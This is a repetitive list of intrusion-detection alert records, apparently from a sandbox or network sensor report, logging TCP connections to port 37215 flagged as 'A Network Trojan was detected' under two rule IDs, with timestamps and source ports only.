              Timestamp:06/13/24-21:32:01.240294
              SID:2835222
              Source Port:35430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275343
              SID:2835222
              Source Port:39412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546312
              SID:2829579
              Source Port:39122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458838
              SID:2829579
              Source Port:46410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608327
              SID:2835222
              Source Port:45258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026660
              SID:2829579
              Source Port:34066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318291
              SID:2829579
              Source Port:58704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.198334
              SID:2835222
              Source Port:42358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075891
              SID:2829579
              Source Port:51904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093531
              SID:2829579
              Source Port:57160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566778
              SID:2829579
              Source Port:51254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938121
              SID:2835222
              Source Port:46908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158078
              SID:2829579
              Source Port:60798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870613
              SID:2835222
              Source Port:35086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220078
              SID:2829579
              Source Port:40664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240734
              SID:2829579
              Source Port:46772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345770
              SID:2835222
              Source Port:46204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786529
              SID:2829579
              Source Port:43324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075673
              SID:2835222
              Source Port:47628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211903
              SID:2835222
              Source Port:51108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.161007
              SID:2835222
              Source Port:53978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458535
              SID:2829579
              Source Port:59658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821928
              SID:2835222
              Source Port:53350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167983
              SID:2835222
              Source Port:56372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343699
              SID:2829579
              Source Port:59360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550215
              SID:2835222
              Source Port:50802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572155
              SID:2835222
              Source Port:59102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507566
              SID:2829579
              Source Port:39290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323857
              SID:2835222
              Source Port:55314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554712
              SID:2829579
              Source Port:56962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632595
              SID:2835222
              Source Port:46946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834227
              SID:2835222
              Source Port:53482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239703
              SID:2829579
              Source Port:37908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508725
              SID:2829579
              Source Port:38926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.113754
              SID:2829579
              Source Port:55016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265460
              SID:2835222
              Source Port:46086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836582
              SID:2829579
              Source Port:48758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375856
              SID:2829579
              Source Port:52016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323290
              SID:2835222
              Source Port:43460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155380
              SID:2835222
              Source Port:45854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546690
              SID:2829579
              Source Port:48916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422823
              SID:2829579
              Source Port:39814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246136
              SID:2835222
              Source Port:49452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487998
              SID:2835222
              Source Port:60512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783734
              SID:2829579
              Source Port:39702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450412
              SID:2829579
              Source Port:54108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454866
              SID:2829579
              Source Port:51526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546396
              SID:2829579
              Source Port:59188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785203
              SID:2835222
              Source Port:47782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504046
              SID:2835222
              Source Port:46818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087457
              SID:2829579
              Source Port:34432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694235
              SID:2835222
              Source Port:38756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134360
              SID:2829579
              Source Port:44400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088529
              SID:2829579
              Source Port:37106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457360
              SID:2829579
              Source Port:60298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373188
              SID:2829579
              Source Port:44484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308540
              SID:2829579
              Source Port:53646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996979
              SID:2835222
              Source Port:42844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.119458
              SID:2835222
              Source Port:44100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096503
              SID:2829579
              Source Port:50322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696932
              SID:2829579
              Source Port:48648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805577
              SID:2829579
              Source Port:45252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181582
              SID:2829579
              Source Port:37760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.161069
              SID:2829579
              Source Port:51340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216973
              SID:2835222
              Source Port:52456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611302
              SID:2835222
              Source Port:42492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131657
              SID:2829579
              Source Port:57274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246483
              SID:2829579
              Source Port:38882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784700
              SID:2835222
              Source Port:32920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842196
              SID:2835222
              Source Port:35420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.178809
              SID:2829579
              Source Port:47918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420249
              SID:2835222
              Source Port:54348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199761
              SID:2829579
              Source Port:55184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129975
              SID:2829579
              Source Port:52054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134307
              SID:2829579
              Source Port:49734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438654
              SID:2835222
              Source Port:44472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155093
              SID:2835222
              Source Port:45792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629879
              SID:2829579
              Source Port:45034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709012
              SID:2829579
              Source Port:58752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570448
              SID:2835222
              Source Port:44782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196222
              SID:2829579
              Source Port:50924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610329
              SID:2835222
              Source Port:49978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454551
              SID:2829579
              Source Port:42328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246053
              SID:2835222
              Source Port:51846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567455
              SID:2829579
              Source Port:46658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978293
              SID:2835222
              Source Port:51316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278545
              SID:2835222
              Source Port:43654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679141
              SID:2829579
              Source Port:40992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439888
              SID:2829579
              Source Port:41790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297210
              SID:2835222
              Source Port:45808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310092
              SID:2835222
              Source Port:56088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670697
              SID:2829579
              Source Port:33388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359713
              SID:2829579
              Source Port:51168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453425
              SID:2835222
              Source Port:56102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839986
              SID:2829579
              Source Port:59092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487511
              SID:2829579
              Source Port:45242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026084
              SID:2829579
              Source Port:46432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.489078
              SID:2835222
              Source Port:37782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989249
              SID:2835222
              Source Port:54734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478623
              SID:2835222
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274349
              SID:2835222
              Source Port:52852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670934
              SID:2835222
              Source Port:51722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694647
              SID:2835222
              Source Port:39198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192193
              SID:2835222
              Source Port:55272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016881
              SID:2829579
              Source Port:32920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607185
              SID:2835222
              Source Port:37218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085772
              SID:2835222
              Source Port:48942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016552
              SID:2835222
              Source Port:51330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274313
              SID:2835222
              Source Port:51930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834264
              SID:2835222
              Source Port:59666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697080
              SID:2829579
              Source Port:39304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130362
              SID:2835222
              Source Port:40372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224234
              SID:2829579
              Source Port:33736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805615
              SID:2829579
              Source Port:46860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710352
              SID:2835222
              Source Port:53632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212891
              SID:2835222
              Source Port:42352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525473
              SID:2835222
              Source Port:53550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153978
              SID:2835222
              Source Port:60250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945880
              SID:2835222
              Source Port:54706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136252
              SID:2835222
              Source Port:33178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731833
              SID:2829579
              Source Port:48746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166423
              SID:2829579
              Source Port:44384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023936
              SID:2829579
              Source Port:39950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252329
              SID:2835222
              Source Port:60818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088773
              SID:2835222
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786022
              SID:2835222
              Source Port:49926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660489
              SID:2835222
              Source Port:46642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937454
              SID:2835222
              Source Port:43788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220335
              SID:2829579
              Source Port:35786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224988
              SID:2829579
              Source Port:35380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708520
              SID:2835222
              Source Port:58126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349711
              SID:2835222
              Source Port:57150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164830
              SID:2835222
              Source Port:40498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307618
              SID:2835222
              Source Port:46412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941905
              SID:2829579
              Source Port:36172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694091
              SID:2835222
              Source Port:39576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551376
              SID:2829579
              Source Port:54016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279880
              SID:2829579
              Source Port:51292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152790
              SID:2829579
              Source Port:45586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405415
              SID:2835222
              Source Port:49450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757759
              SID:2829579
              Source Port:41782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359002
              SID:2835222
              Source Port:35742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075848
              SID:2829579
              Source Port:54254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278695
              SID:2829579
              Source Port:33900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089622
              SID:2835222
              Source Port:54888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199858
              SID:2835222
              Source Port:60044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375145
              SID:2835222
              Source Port:58996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613664
              SID:2835222
              Source Port:58648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264526
              SID:2829579
              Source Port:39820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013793
              SID:2829579
              Source Port:49474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.138064
              SID:2835222
              Source Port:52060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222316
              SID:2829579
              Source Port:54526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404609
              SID:2835222
              Source Port:37048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.672139
              SID:2829579
              Source Port:51784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089206
              SID:2835222
              Source Port:39836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458282
              SID:2829579
              Source Port:51994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801328
              SID:2829579
              Source Port:43144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800071
              SID:2835222
              Source Port:53790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322475
              SID:2835222
              Source Port:40452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300265
              SID:2829579
              Source Port:37536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438567
              SID:2835222
              Source Port:34562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152232
              SID:2835222
              Source Port:33390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355429
              SID:2835222
              Source Port:47226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177908
              SID:2829579
              Source Port:53908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801370
              SID:2829579
              Source Port:35614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885110
              SID:2829579
              Source Port:58538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309404
              SID:2829579
              Source Port:35784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370581
              SID:2835222
              Source Port:47320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221418
              SID:2835222
              Source Port:37294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659174
              SID:2829579
              Source Port:44414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487735
              SID:2835222
              Source Port:46006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194570
              SID:2835222
              Source Port:33566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378225
              SID:2829579
              Source Port:50414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377892
              SID:2835222
              Source Port:43530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059631
              SID:2829579
              Source Port:39982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568251
              SID:2835222
              Source Port:34754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943710
              SID:2835222
              Source Port:45042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153501
              SID:2829579
              Source Port:52394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610322
              SID:2829579
              Source Port:60508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222193
              SID:2835222
              Source Port:52452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196505
              SID:2829579
              Source Port:35416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550905
              SID:2835222
              Source Port:54186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271543
              SID:2829579
              Source Port:59956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039946
              SID:2835222
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759199
              SID:2829579
              Source Port:46080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660278
              SID:2835222
              Source Port:49132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885352
              SID:2829579
              Source Port:37424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317468
              SID:2829579
              Source Port:56582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377649
              SID:2829579
              Source Port:43524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257375
              SID:2829579
              Source Port:46178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.402872
              SID:2829579
              Source Port:55534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407492
              SID:2835222
              Source Port:50678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569132
              SID:2829579
              Source Port:39076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787469
              SID:2829579
              Source Port:49126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656106
              SID:2835222
              Source Port:36752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914612
              SID:2829579
              Source Port:38244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993978
              SID:2829579
              Source Port:43518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709831
